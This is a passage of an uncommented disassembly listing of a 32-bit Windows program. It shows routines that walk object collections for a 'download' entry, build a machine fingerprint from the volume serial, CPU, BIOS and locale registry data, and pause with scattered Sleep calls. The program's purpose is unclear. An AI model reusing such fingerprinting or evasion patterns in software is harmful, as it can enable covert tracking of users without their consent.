and dword ptr [esi+4], 0
cmp [esp+8+arg_4], 0
mov dword ptr [esi+8], 1
jz short loc_4043DD
test edi, edi
jz short loc_4043DD
push edi
call dword_41326C
push eax
push edi
call dword_413270
test eax, eax
mov [esi], eax
jnz short loc_4043DF
push 8007000Eh
call sub_411822
jmp short loc_4043DF
; ---------------------------------------------------------------------------
loc_4043DD: ; CODE XREF: sub_40439E+18�j
; sub_40439E+1C�j
mov [esi], edi
loc_4043DF: ; CODE XREF: sub_40439E+31�j
; sub_40439E+3D�j
mov eax, esi
pop edi
pop esi
retn 8
sub_40439E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4043E6 proc near ; CODE XREF: sub_403488+57�p
; sub_403488+454�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push esi
mov esi, ecx
lea ecx, [ebp+var_4]
mov eax, [esi]
push ecx
push esi
call dword ptr [eax+34h]
test eax, eax
jge short loc_40440B
push offset dword_417238
push esi
push eax
call sub_411830
loc_40440B: ; CODE XREF: sub_4043E6+17�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_4]
pop esi
mov [eax], ecx
leave
retn 4
sub_4043E6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404418 proc near ; CODE XREF: sub_403488+BBF�p
; sub_403488+C43�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push esi
mov esi, ecx
lea ecx, [ebp+var_4]
mov eax, [esi]
push ecx
push esi
call dword ptr [eax+40h]
test eax, eax
jge short loc_40443D
push offset dword_417238
push esi
push eax
call sub_411830
loc_40443D: ; CODE XREF: sub_404418+17�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_4]
pop esi
mov [eax], ecx
leave
retn 4
sub_404418 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40444A proc near ; CODE XREF: sub_403488+104�p
; sub_403488+225�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push esi
mov esi, ecx
lea ecx, [ebp+var_4]
mov eax, [esi]
push ecx
push esi
call dword ptr [eax+68h]
test eax, eax
jge short loc_40446F
push offset dword_417238
push esi
push eax
call sub_411830
loc_40446F: ; CODE XREF: sub_40444A+17�j
mov ecx, [ebp+arg_0]
push 0
push [ebp+var_4]
call sub_404347
mov eax, [ebp+arg_0]
pop esi
leave
retn 4
sub_40444A endp
; =============== S U B R O U T I N E =======================================
sub_404484 proc near ; CODE XREF: sub_40831F+87D�p
mov eax, offset loc_411DF0
call sub_41163A ; _EH_prolog
sub esp, 1Ch
push ebx
push esi
push edi
xor ebx, ebx
mov [ebp-4], ebx
mov [ebp-18h], ebx
mov [ebp-10h], ebx
mov esi, [ebp+8]
mov byte ptr [ebp-4], 1
cmp esi, ebx
mov edi, 80004003h
jnz short loc_4044B5
push edi
call sub_411822
loc_4044B5: ; CODE XREF: sub_404484+29�j
lea eax, [ebp-14h]
mov ecx, esi
push eax
call sub_4043E6
push dword ptr [eax]
lea ecx, [ebp-10h]
call sub_4062A0
lea ecx, [ebp-14h]
call sub_406293
loc_4044D2: ; CODE XREF: sub_404484+149�j
push ebx
lea ecx, [ebp-10h]
call sub_4062CB
test al, al
jnz loc_4045D2
push offset aDownload ; "download"
lea ecx, [ebp-20h]
call sub_404151
mov esi, eax
cmp [ebp-10h], ebx
mov byte ptr [ebp-4], 2
jnz short loc_404501
push edi
call sub_411822
loc_404501: ; CODE XREF: sub_404484+75�j
mov ecx, [ebp-10h]
lea eax, [ebp-1Ch]
push eax
call sub_40430D
push esi
mov ecx, eax
call sub_4041B8
mov ebx, eax
lea ecx, [ebp-1Ch]
neg ebx
sbb bl, bl
inc bl
call sub_4041A5
lea ecx, [ebp-20h]
mov byte ptr [ebp-4], 1
call sub_4041A5
test bl, bl
jz short loc_40459E
xor esi, esi
cmp [ebp-10h], esi
jnz short loc_404542
push edi
call sub_411822
loc_404542: ; CODE XREF: sub_404484+B6�j
mov ecx, [ebp-10h]
lea eax, [ebp-14h]
push eax
call sub_4043E6
mov byte ptr [ebp-4], 3
loc_404552: ; CODE XREF: sub_404484+107�j
push esi
lea ecx, [ebp-14h]
call sub_4062CB
test al, al
jnz short loc_40458D
inc dword ptr [ebp-18h]
cmp [ebp-14h], esi
jnz short loc_40456D
push edi
call sub_411822
loc_40456D: ; CODE XREF: sub_404484+E1�j
mov ecx, [ebp-14h]
lea eax, [ebp-24h]
push eax
call sub_404418
push dword ptr [eax]
lea ecx, [ebp-14h]
call sub_4062A0
lea ecx, [ebp-24h]
call sub_406293
jmp short loc_404552
; ---------------------------------------------------------------------------
loc_40458D: ; CODE XREF: sub_404484+D9�j
mov eax, [ebp-14h]
mov byte ptr [ebp-4], 1
cmp eax, esi
jz short loc_40459E
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_40459E: ; CODE XREF: sub_404484+AF�j
; sub_404484+112�j
cmp dword ptr [ebp-10h], 0
jnz short loc_4045AA
push edi
call sub_411822
loc_4045AA: ; CODE XREF: sub_404484+11E�j
mov ecx, [ebp-10h]
lea eax, [ebp-28h]
push eax
call sub_404418
push dword ptr [eax]
lea ecx, [ebp-10h]
call sub_4062A0
lea ecx, [ebp-28h]
call sub_406293
mov esi, [ebp+8]
xor ebx, ebx
jmp loc_4044D2
; ---------------------------------------------------------------------------
loc_4045D2: ; CODE XREF: sub_404484+59�j
mov eax, [ebp-10h]
and byte ptr [ebp-4], 0
cmp eax, ebx
jz short loc_4045E3
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_4045E3: ; CODE XREF: sub_404484+157�j
or dword ptr [ebp-4], 0FFFFFFFFh
cmp esi, ebx
jz short loc_4045F1
mov eax, [esi]
push esi
call dword ptr [eax+8]
loc_4045F1: ; CODE XREF: sub_404484+165�j
mov ecx, [ebp-0Ch]
mov eax, [ebp-18h]
pop edi
pop esi
pop ebx
mov large fs:0, ecx
leave
retn 4
sub_404484 endp
; =============== S U B R O U T I N E =======================================
sub_404605 proc near ; CODE XREF: sub_40831F+970�p
mov eax, offset loc_411E6F
call sub_41163A ; _EH_prolog
mov eax, 208Ch
call sub_4115D0
push ebx
mov ebx, ecx
mov ecx, [ebp+0Ch]
push esi
test ecx, ecx
push edi
jle loc_404A1A
mov eax, [ebp+8]
mov dword ptr [ebp-1Ch], 0FFFFE000h
sub [ebp-1Ch], eax
mov [ebp-28h], ecx
lea esi, [eax+2000h]
loc_40463F: ; CODE XREF: sub_404605+40F�j
cmp byte ptr [esi+12000h], 0
jz loc_404733
push esi
call sub_41162E ; strlen
test eax, eax
pop ecx
jbe loc_404733
cmp byte ptr [esi], 23h
jnz loc_404733
lea eax, [ebp-2098h]
push esi
push eax
call sub_411628 ; strcpy
mov edi, offset dword_417260
lea eax, [ebp-2098h]
push edi
push eax
call dword_4131CC ; strstr
add esp, 10h
test eax, eax
jz short loc_4046C1
lea ecx, [ebp-2098h]
sub eax, ecx
inc eax
cmp eax, 1
mov [ebp+0Ch], eax
jle short loc_4046C1
push eax
lea eax, [ebp-2098h]
push eax
push esi
call dword_41319C ; strncpy
mov eax, [ebp-1Ch]
mov ecx, [ebp+8]
add eax, esi
add esp, 0Ch
add eax, [ebp+0Ch]
and byte ptr [eax+ecx+2000h], 0
loc_4046C1: ; CODE XREF: sub_404605+84�j
; sub_404605+95�j
push edi
push esi
call sub_411640 ; strcat
push dword ptr [ebx+20h]
push esi
call sub_411640 ; strcat
add esp, 10h
lea ecx, [ebp-14h]
call sub_41151E
and dword ptr [ebp-4], 0
push esi
lea ecx, [ebp-14h]
call sub_41150C
push ecx
lea eax, [ebp-14h]
mov ecx, esp
mov [ebp+0Ch], esp
push eax
call sub_411506
lea eax, [ebp-38h]
mov ecx, ebx
push eax
call sub_402FAF
push eax
lea ecx, [ebp-14h]
mov byte ptr [ebp-4], 1
call sub_411518
and byte ptr [ebp-4], 0
lea ecx, [ebp-38h]
call sub_411512
push dword ptr [ebp-14h]
push esi
call sub_411628 ; strcpy
or dword ptr [ebp-4], 0FFFFFFFFh
pop ecx
pop ecx
lea ecx, [ebp-14h]
call sub_411512
loc_404733: ; CODE XREF: sub_404605+41�j
; sub_404605+50�j ...
lea ecx, [ebp-10h]
call sub_41151E
lea ecx, [ebp-24h]
mov dword ptr [ebp-4], 2
call sub_41151E
cmp byte ptr [esi+12000h], 0
mov byte ptr [ebp-4], 3
jz loc_404825
lea edi, [ebx+20h]
lea ecx, [ebp-24h]
push edi
call sub_411518
push offset dword_417258
lea eax, [ebp-2Ch]
push edi
push eax
call sub_41152A
push eax
lea ecx, [ebp-10h]
mov byte ptr [ebp-4], 4
call sub_411518
lea ecx, [ebp-2Ch]
mov byte ptr [ebp-4], 3
call sub_411512
push dword ptr [ebp-10h]
call sub_4021DB
test eax, eax
pop ecx
jz short loc_4047A8
push 1
push dword ptr [ebp-10h]
call sub_401C92
pop ecx
pop ecx
loc_4047A8: ; CODE XREF: sub_404605+195�j
push dword ptr [edi]
call sub_4021DB
test eax, eax
pop ecx
jz short loc_4047C4
mov edi, [edi]
push 1
push dword ptr [ebp-10h]
push edi
call sub_401D8A
add esp, 0Ch
loc_4047C4: ; CODE XREF: sub_404605+1AD�j
push 80000000h
push 1
push ecx
mov ecx, esp
mov [ebp+0Ch], esp
push offset byte_419C40
call sub_4114FA
push ecx
mov byte ptr [ebp-4], 5
mov ecx, esp
mov [ebp-20h], esp
push offset dword_41724C
call sub_4114FA
lea ecx, [ebp-58h]
mov byte ptr [ebp-4], 3
call sub_40671B
push ecx
lea eax, [esi+0E000h]
mov ecx, esp
mov [ebp+0Ch], esp
push eax
mov byte ptr [ebp-4], 6
call sub_4114FA
lea ecx, [ebp-58h]
call sub_406BA8
lea ecx, [ebp-58h]
mov byte ptr [ebp-4], 3
call sub_4068AF
loc_404825: ; CODE XREF: sub_404605+150�j
push 28h
call dword_4130E0 ; Sleep
mov al, [esi+12000h]
mov ecx, ebx
push eax
mov al, [esi+12004h]
push dword ptr [esi+12008h]
push eax
mov al, [esi+12001h]
push eax
mov al, [esi+12002h]
push eax
lea eax, [esi+2000h]
push eax
lea eax, [esi+4000h]
push eax
lea eax, [esi-2000h]
push esi
push eax
call sub_402EC9
lea ecx, [ebp-18h]
mov [ebp+0Fh], al
call sub_41151E
lea eax, [esi+10000h]
lea ecx, [ebp-18h]
push eax
mov byte ptr [ebp-4], 7
call sub_41150C
lea eax, [ebp-18h]
push offset dword_417248
push eax
lea eax, [ebp-30h]
push eax
call sub_41152A
lea edi, [esi+0E000h]
mov byte ptr [ebp-4], 8
push edi
push eax
lea eax, [ebp-34h]
push eax
call sub_41152A
push eax
lea ecx, [ebp-18h]
mov byte ptr [ebp-4], 9
call sub_411518
lea ecx, [ebp-34h]
mov byte ptr [ebp-4], 8
call sub_411512
lea ecx, [ebp-30h]
mov byte ptr [ebp-4], 7
call sub_411512
push ecx
lea eax, [ebp-18h]
mov ecx, esp
mov [ebp-20h], esp
push eax
call sub_411506
mov ecx, ebx
call sub_4057AB
mov al, [esi+12000h]
test al, al
jz loc_4049E7
cmp byte ptr [ebp+0Fh], 0
jz short loc_404965
push 80000000h
push 1
push ecx
mov byte ptr [ebx+18h], 1
mov ecx, esp
mov [ebp+0Ch], esp
push offset byte_419C40
call sub_4114FA
push ecx
mov byte ptr [ebp-4], 0Ah
mov ecx, esp
mov [ebp-20h], esp
push offset dword_41724C
call sub_4114FA
lea ecx, [ebp-98h]
mov byte ptr [ebp-4], 7
call sub_40671B
push ecx
mov byte ptr [ebp-4], 0Bh
mov ecx, esp
mov [ebp+0Ch], esp
push edi
call sub_4114FA
lea ecx, [ebp-98h]
call sub_406BA8
mov byte ptr [ebp-4], 7
lea ecx, [ebp-98h]
jmp short loc_4049E2
; ---------------------------------------------------------------------------
loc_404965: ; CODE XREF: sub_404605+2F9�j
test al, al
jz short loc_4049E7
cmp byte ptr [ebp+0Fh], 0
jnz short loc_4049E7
push dword ptr [ebp-10h]
call sub_4021DB
test eax, eax
pop ecx
jz short loc_40498C
push 1
push dword ptr [ebp-24h]
push dword ptr [ebp-10h]
call sub_401D8A
add esp, 0Ch
loc_40498C: ; CODE XREF: sub_404605+375�j
push 80000000h
push 1
push ecx
mov ecx, esp
mov [ebp+0Ch], esp
push offset byte_419C40
call sub_4114FA
push ecx
mov byte ptr [ebp-4], 0Ch
mov ecx, esp
mov [ebp-20h], esp
push offset dword_41724C
call sub_4114FA
lea ecx, [ebp-78h]
mov byte ptr [ebp-4], 7
call sub_40671B
push ecx
mov byte ptr [ebp-4], 0Dh
mov ecx, esp
mov [ebp+0Ch], esp
push ebx
call sub_411506
lea ecx, [ebp-78h]
call sub_406BA8
mov byte ptr [ebp-4], 7
lea ecx, [ebp-78h]
loc_4049E2: ; CODE XREF: sub_404605+35E�j
call sub_4068AF
loc_4049E7: ; CODE XREF: sub_404605+2EF�j
; sub_404605+362�j ...
lea ecx, [ebp-18h]
mov byte ptr [ebp-4], 3
call sub_411512
lea ecx, [ebp-24h]
mov byte ptr [ebp-4], 2
call sub_411512
or dword ptr [ebp-4], 0FFFFFFFFh
lea ecx, [ebp-10h]
call sub_411512
add esi, 1400Ch
dec dword ptr [ebp-28h]
jnz loc_40463F
loc_404A1A: ; CODE XREF: sub_404605+1E�j
mov ecx, [ebp-0Ch]
pop edi
pop esi
mov al, 1
mov large fs:0, ecx
pop ebx
leave
retn 8
sub_404605 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404A2D proc near ; CODE XREF: sub_402C48+123�p
var_12C = dword ptr -12Ch
var_128 = byte ptr -128h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 12Ch
push ebx
push esi
push edi
push [ebp+arg_4]
call sub_402199
pop ecx
push [ebp+arg_4]
call dword_413048 ; SetCurrentDirectoryA
xor esi, esi
push 2
push esi
push [ebp+arg_0]
call sub_410FDB
mov edi, eax
lea eax, [ebp+var_12C]
push eax
push 0FFFFFFFFh
push edi
call sub_4110A8
mov ebx, [ebp+var_12C]
add esp, 18h
test ebx, ebx
jle short loc_404A9E
loc_404A76: ; CODE XREF: sub_404A2D+6F�j
lea eax, [ebp+var_12C]
push eax
push esi
push edi
call sub_4110A8
push 2
lea eax, [ebp+var_128]
push 0
push eax
push esi
push edi
call sub_411390
add esp, 20h
inc esi
cmp esi, ebx
jl short loc_404A76
loc_404A9E: ; CODE XREF: sub_404A2D+47�j
push edi
call sub_4113FB
pop ecx
pop edi
pop esi
mov al, 1
pop ebx
leave
retn 8
sub_404A2D endp
; =============== S U B R O U T I N E =======================================
sub_404AAE proc near ; CODE XREF: sub_402C48+DA�p
mov eax, offset loc_411E8E
call sub_41163A ; _EH_prolog
push ecx
push ecx
push ebx
push esi
xor ebx, ebx
push 8
mov [ebp-4], ebx
call sub_4114F4
pop ecx
mov ecx, eax
mov [ebp-14h], ecx
cmp ecx, ebx
mov byte ptr [ebp-4], 1
jz short loc_404ADF
call sub_401000
mov esi, eax
jmp short loc_404AE1
; ---------------------------------------------------------------------------
loc_404ADF: ; CODE XREF: sub_404AAE+26�j
xor esi, esi
loc_404AE1: ; CODE XREF: sub_404AAE+2F�j
mov ecx, esi
mov [ebp-4], bl
call sub_40103D
lea eax, [ebp-10h]
mov ecx, esi
push eax
push dword ptr [ebp+8]
call sub_40146A
mov ecx, esi
call sub_4010DD
cmp esi, ebx
jz short loc_404B0C
mov eax, [esi]
push 1
mov ecx, esi
call dword ptr [eax]
loc_404B0C: ; CODE XREF: sub_404AAE+54�j
mov eax, [ebp+0Ch]
cmp eax, [ebp-10h]
jnz short loc_404B16
mov bl, 1
loc_404B16: ; CODE XREF: sub_404AAE+64�j
or dword ptr [ebp-4], 0FFFFFFFFh
lea ecx, [ebp+8]
call sub_411512
mov ecx, [ebp-0Ch]
mov al, bl
pop esi
pop ebx
mov large fs:0, ecx
leave
retn 8
sub_404AAE endp
; =============== S U B R O U T I N E =======================================
sub_404B34 proc near ; CODE XREF: sub_402C48+88�p
; sub_402C48+1D2�p ...
arg_0 = byte ptr 4
lea ecx, [esp+arg_0]
call sub_411512
retn 4
sub_404B34 endp
; =============== S U B R O U T I N E =======================================
sub_404B40 proc near ; CODE XREF: sub_402A1E+DD�p
mov eax, offset loc_411EE9
call sub_41163A ; _EH_prolog
sub esp, 324h
push ebx
push esi
mov [ebp-34h], ecx
xor esi, esi
push edi
lea ecx, [ebp-24h]
mov [ebp-38h], esi
call sub_41151E
lea ecx, [ebp-28h]
mov [ebp-4], esi
call sub_41151E
mov dx, ds:word_419C44
xor eax, eax
lea edi, [ebp-52h]
mov [ebp-54h], dx
stosd
stosd
stosd
stosd
stosw
xor eax, eax
lea edi, [ebp-62h]
mov [ebp-64h], dx
push 40h
stosd
stosd
pop ecx
xor eax, eax
lea edi, [ebp-32Eh]
mov [ebp-330h], dx
rep stosd
stosw
xor eax, eax
lea edi, [ebp-3Ah]
mov [ebp-3Ch], dx
push 40h
stosw
pop ecx
lea edi, [ebp-1C6h]
mov [ebp-1C8h], dx
mov [ebp-18h], dx
rep stosd
stosw
xor eax, eax
lea edi, [ebp-16h]
stosb
lea edi, [ebp-0Eh]
mov [ebp-10h], dx
stosb
lea edi, [ebp-12h]
mov [ebp-14h], dx
stosb
lea eax, [ebp-30h]
push offset a04x ; "%04X"
push eax
mov byte ptr [ebp-4], 1
mov [ebp-40h], esi
mov byte ptr [ebp-19h], 1
call dword_4130CC ; lstrcpyA
cmp byte ptr [ebp+0Ch], 0
mov ebx, dword_413074
jz short loc_404C12
lea eax, [ebp-1C8h]
push offset asc_417350 ; "{"
push eax
call ebx ; lstrcatA
loc_404C12: ; CODE XREF: sub_404B40+C2�j
lea eax, [ebp-330h]
push 104h
push eax
call dword_4130D4 ; GetWindowsDirectoryA
xor eax, eax
lea ecx, [ebp-38h]
push eax
push eax
push eax
lea esi, [ebp-330h]
lea edi, [ebp-3Ch]
push eax
push ecx
push eax
movsw
push eax
lea eax, [ebp-3Ch]
push eax
movsb
call dword_4130B4 ; GetVolumeInformationA
mov ecx, [ebp-34h]
lea eax, [ebp-54h]
push 10h
push eax
push dword ptr [ebp-38h]
call sub_40509A
mov edi, dword_4130CC
lea eax, [ebp-30h]
push offset a08x ; "%08X"
push eax
call edi ; lstrcpyA
push dword ptr [ebp-38h]
mov esi, dword_41329C
lea eax, [ebp-30h]
push eax
lea eax, [ebp-54h]
push eax
call esi ; wsprintfA
add esp, 0Ch
lea eax, [ebp-54h]
push eax
call dword_413298 ; CharUpperA
lea eax, [ebp-54h]
push eax
lea eax, [ebp-1C8h]
push eax
call ebx ; lstrcatA
push 80000002h
push 1
push 0
push ecx
mov ecx, esp
mov [ebp-20h], esp
push offset aHardwareDescri ; "HARDWARE\\DESCRIPTION\\System\\CentralProc"...
call sub_4114FA
lea ecx, [ebp-0A4h]
call sub_406374
lea ecx, [ebp-0A4h]
mov byte ptr [ebp-4], 2
call sub_406606
mov [ebp-20h], eax
lea eax, [ebp-30h]
push offset a04x ; "%04X"
push eax
call edi ; lstrcpyA
push dword ptr [ebp-20h]
lea eax, [ebp-30h]
push eax
lea eax, [ebp-54h]
push eax
call esi ; wsprintfA
add esp, 0Ch
mov edi, offset asc_417310 ; "-"
lea eax, [ebp-1C8h]
push edi
push eax
call ebx ; lstrcatA
push 1Eh
call dword_4130E0 ; Sleep
lea eax, [ebp-54h]
push eax
lea eax, [ebp-1C8h]
push eax
call ebx ; lstrcatA
call dword_4130B8 ; GetSystemDefaultLCID
push eax
lea eax, [ebp-30h]
push eax
lea eax, [ebp-54h]
push eax
call esi ; wsprintfA
add esp, 0Ch
lea eax, [ebp-1C8h]
push edi
push eax
call ebx ; lstrcatA
lea eax, [ebp-54h]
push eax
lea eax, [ebp-1C8h]
push eax
call ebx ; lstrcatA
push 80000002h
push 1
push ecx
mov ecx, esp
mov [ebp-20h], esp
push offset byte_419C40
call sub_4114FA
push ecx
mov byte ptr [ebp-4], 3
mov ecx, esp
mov [ebp-58h], esp
push offset aHardwareDesc_0 ; "HARDWARE\\DESCRIPTION\\System\\SystemBiosD"...
call sub_4114FA
lea ecx, [ebp-84h]
mov byte ptr [ebp-4], 2
call sub_40671B
lea eax, [ebp-20h]
lea ecx, [ebp-84h]
push eax
mov byte ptr [ebp-4], 4
call sub_406B4C
lea eax, [ebp-20h]
lea ecx, [ebp-28h]
push eax
mov byte ptr [ebp-4], 5
call sub_411518
lea ecx, [ebp-20h]
mov byte ptr [ebp-4], 4
call sub_411512
mov eax, [ebp-28h]
mov eax, [eax-8]
test eax, eax
jle loc_404E34
push eax
lea ecx, [ebp-28h]
call sub_411542
mov cl, [eax]
mov [ebp-40h], eax
mov [ebp-18h], cl
mov cl, [eax+1]
and byte ptr [ebp-16h], 0
mov [ebp-17h], cl
mov cl, [eax+3]
push edi
mov [ebp-10h], cl
mov cl, [eax+4]
and byte ptr [ebp-0Eh], 0
mov [ebp-0Fh], cl
mov cl, [eax+6]
mov [ebp-14h], cl
mov al, [eax+7]
and byte ptr [ebp-12h], 0
mov [ebp-13h], al
lea eax, [ebp-1C8h]
push eax
call ebx ; lstrcatA
lea eax, [ebp-18h]
push eax
lea eax, [ebp-1C8h]
push eax
call ebx ; lstrcatA
lea eax, [ebp-10h]
push eax
lea eax, [ebp-1C8h]
push eax
call ebx ; lstrcatA
lea eax, [ebp-1C8h]
push edi
push eax
call ebx ; lstrcatA
lea eax, [ebp-14h]
push eax
lea eax, [ebp-1C8h]
push eax
call ebx ; lstrcatA
push 0FFFFFFFFh
lea ecx, [ebp-28h]
call sub_41153C
mov edi, dword_4130CC
jmp short loc_404E51
; ---------------------------------------------------------------------------
loc_404E34: ; CODE XREF: sub_404B40+266�j
mov edi, dword_4130CC
push offset word_419C44
push 0
call edi ; lstrcpyA
lea eax, [ebp-1C8h]
push offset a000000 ; "-0000-00"
push eax
call ebx ; lstrcatA
loc_404E51: ; CODE XREF: sub_404B40+2F2�j
lea eax, [ebp-22Ch]
push offset a0a887397a5f240 ; "0A887397A5F240675EEF4D35019B6883A6FA5D6"...
push eax
call edi ; lstrcpyA
push 80000002h
push 1
push ecx
mov ecx, esp
mov [ebp-58h], esp
push offset byte_419C40
call sub_4114FA
lea eax, [ebp-22Ch]
mov byte ptr [ebp-4], 6
push eax
call dword_4130BC ; lstrlenA
push ecx
mov ecx, esp
mov [ebp-20h], esp
push eax
lea eax, [ebp-22Ch]
push eax
push ecx
mov ecx, [ebp-34h]
call sub_4030F7
lea ecx, [ebp-0C4h]
mov byte ptr [ebp-4], 4
call sub_40671B
lea eax, [ebp-20h]
lea ecx, [ebp-0C4h]
push eax
mov byte ptr [ebp-4], 7
call sub_406B4C
lea eax, [ebp-20h]
lea ecx, [ebp-24h]
push eax
mov byte ptr [ebp-4], 8
call sub_411518
lea ecx, [ebp-20h]
mov byte ptr [ebp-4], 7
call sub_411512
mov eax, [ebp-24h]
mov eax, [eax-8]
test eax, eax
jle short loc_404F51
push eax
lea ecx, [ebp-24h]
call sub_411542
mov cl, [eax]
mov [ebp-18h], cl
mov cl, [eax+1]
and byte ptr [ebp-16h], 0
mov [ebp-17h], cl
mov cl, [eax+3]
mov [ebp-10h], cl
mov cl, [eax+4]
and byte ptr [ebp-0Eh], 0
mov [ebp-0Fh], cl
mov cl, [eax+6]
mov [ebp-14h], cl
mov al, [eax+7]
and byte ptr [ebp-12h], 0
mov [ebp-13h], al
lea eax, [ebp-18h]
push eax
lea eax, [ebp-1C8h]
push eax
call ebx ; lstrcatA
lea eax, [ebp-10h]
push eax
lea eax, [ebp-1C8h]
push eax
call ebx ; lstrcatA
lea eax, [ebp-14h]
push eax
lea eax, [ebp-1C8h]
push eax
call ebx ; lstrcatA
push 0FFFFFFFFh
lea ecx, [ebp-24h]
call sub_41153C
jmp short loc_404F69
; ---------------------------------------------------------------------------
loc_404F51: ; CODE XREF: sub_404B40+3A4�j
push offset word_419C44
push dword ptr [ebp-40h]
call edi ; lstrcpyA
lea eax, [ebp-1C8h]
push offset a000001 ; "000001"
push eax
call ebx ; lstrcatA
loc_404F69: ; CODE XREF: sub_404B40+40F�j
lea eax, [ebp-64h]
push 104h
push eax
push 5
push 400h
call dword_4130C0 ; GetLocaleInfoA
push 21h
call dword_4130E0 ; Sleep
mov ecx, [ebp-34h]
lea eax, [ebp-64h]
push eax
call sub_405049
push eax
lea eax, [ebp-30h]
push eax
lea eax, [ebp-54h]
push eax
call esi ; wsprintfA
add esp, 0Ch
lea eax, [ebp-54h]
push eax
lea eax, [ebp-1C8h]
push eax
call ebx ; lstrcatA
cmp byte ptr [ebp+0Ch], 0
jz short loc_404FC2
lea eax, [ebp-1C8h]
push offset asc_417278 ; "}"
push eax
call ebx ; lstrcatA
loc_404FC2: ; CODE XREF: sub_404B40+472�j
lea eax, [ebp-1C8h]
push eax
push dword ptr [ebp+8]
call edi ; lstrcpyA
push dword ptr [ebp+8]
call dword_4130BC ; lstrlenA
movzx ecx, byte ptr [ebp+0Ch]
shl ecx, 1
sub eax, ecx
cmp eax, 24h
jz short loc_404FE8
and byte ptr [ebp-19h], 0
loc_404FE8: ; CODE XREF: sub_404B40+4A2�j
push 20h
call dword_4130E0 ; Sleep
lea ecx, [ebp-0C4h]
mov byte ptr [ebp-4], 4
call sub_4068AF
lea ecx, [ebp-84h]
mov byte ptr [ebp-4], 2
call sub_4068AF
lea ecx, [ebp-0A4h]
mov byte ptr [ebp-4], 1
call sub_4064C6
and byte ptr [ebp-4], 0
lea ecx, [ebp-28h]
call sub_411512
or dword ptr [ebp-4], 0FFFFFFFFh
lea ecx, [ebp-24h]
call sub_411512
mov ecx, [ebp-0Ch]
mov al, [ebp-19h]
pop edi
pop esi
mov large fs:0, ecx
pop ebx
leave
retn 8
sub_404B40 endp
; =============== S U B R O U T I N E =======================================
sub_405049 proc near ; CODE XREF: sub_404B40+44E�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push esi
xor esi, esi
xor dl, dl
loc_405052: ; CODE XREF: sub_405049+F�j
cmp byte ptr [eax], 20h
jnz short loc_40505A
inc eax
jmp short loc_405052
; ---------------------------------------------------------------------------
loc_40505A: ; CODE XREF: sub_405049+C�j
mov cl, [eax]
cmp cl, 2Bh
jz short loc_405068
cmp cl, 2Dh
jnz short loc_405069
mov dl, 1
loc_405068: ; CODE XREF: sub_405049+16�j
; sub_405049+3A�j
inc eax
loc_405069: ; CODE XREF: sub_405049+1B�j
mov cl, [eax]
test cl, cl
jz short loc_405085
cmp cl, 30h
jl short loc_405085
cmp cl, 39h
jg short loc_405085
movsx ecx, cl
lea esi, [esi+esi*4]
lea esi, [ecx+esi*2-30h]
jmp short loc_405068
; ---------------------------------------------------------------------------
loc_405085: ; CODE XREF: sub_405049+24�j
; sub_405049+29�j ...
cmp dl, 1
jnz short loc_40508C
neg esi
loc_40508C: ; CODE XREF: sub_405049+3F�j
push 1Eh
call dword_4130E0 ; Sleep
mov eax, esi
pop esi
retn 4
sub_405049 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40509A proc near ; CODE XREF: sub_404B40+112�p
var_84 = byte ptr -84h
var_83 = byte ptr -83h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 84h
push esi
push edi
push 1Fh
xor eax, eax
pop ecx
lea edi, [ebp+var_83]
rep stosd
stosw
mov edx, [ebp+arg_4]
xor esi, esi
and [ebp+var_4], esi
stosb
mov edi, [ebp+arg_0]
test edi, edi
jnz short loc_4050D4
mov ecx, [ebp+arg_8]
mov byte ptr [edx], 30h
dec ecx
mov [ebp+var_4], 1
jmp short loc_4050D7
; ---------------------------------------------------------------------------
loc_4050D4: ; CODE XREF: sub_40509A+28�j
mov ecx, [ebp+arg_8]
loc_4050D7: ; CODE XREF: sub_40509A+38�j
and [ebp+var_84], 0
push ebx
test edi, edi
jz short loc_405108
loc_4050E3: ; CODE XREF: sub_40509A+69�j
push 0Ah
mov eax, edi
xor edx, edx
pop ebx
div ebx
push ebx
mov eax, edi
pop edi
add dl, 30h
mov [ebp+esi+var_84], dl
xor edx, edx
div edi
inc esi
mov edi, eax
test edi, edi
jnz short loc_4050E3
mov edx, [ebp+arg_4]
loc_405108: ; CODE XREF: sub_40509A+47�j
cmp ecx, esi
jle short loc_40512D
sub ecx, esi
lea edi, [ebp+esi+var_84]
mov [ebp+arg_8], ecx
mov ebx, ecx
mov eax, 30303030h
shr ecx, 2
rep stosd
mov ecx, ebx
and ecx, 3
add esi, ebx
rep stosb
loc_40512D: ; CODE XREF: sub_40509A+70�j
mov eax, [ebp+var_4]
dec esi
pop ebx
js short loc_405144
loc_405134: ; CODE XREF: sub_40509A+A8�j
mov cl, [ebp+esi+var_84]
dec esi
mov [eax+edx], cl
inc eax
test esi, esi
jge short loc_405134
loc_405144: ; CODE XREF: sub_40509A+98�j
and byte ptr [eax+edx], 0
pop edi
mov eax, edx
pop esi
leave
retn 0Ch
sub_40509A endp
; =============== S U B R O U T I N E =======================================
sub_405150 proc near ; CODE XREF: sub_405E1F+198�p
mov eax, offset loc_411F44
call sub_41163A ; _EH_prolog
sub esp, 38h
push esi
push edi
mov edi, ecx
lea ecx, [ebp-10h]
mov dword ptr [ebp-4], 1
call sub_41151E
push offset aSoftwareMicros ; "SOFTWARE\\Microso"
lea ecx, [ebp-10h]
mov byte ptr [ebp-4], 2
call sub_41150C
mov esi, dword_4130E0
push 1Eh
call esi ; Sleep
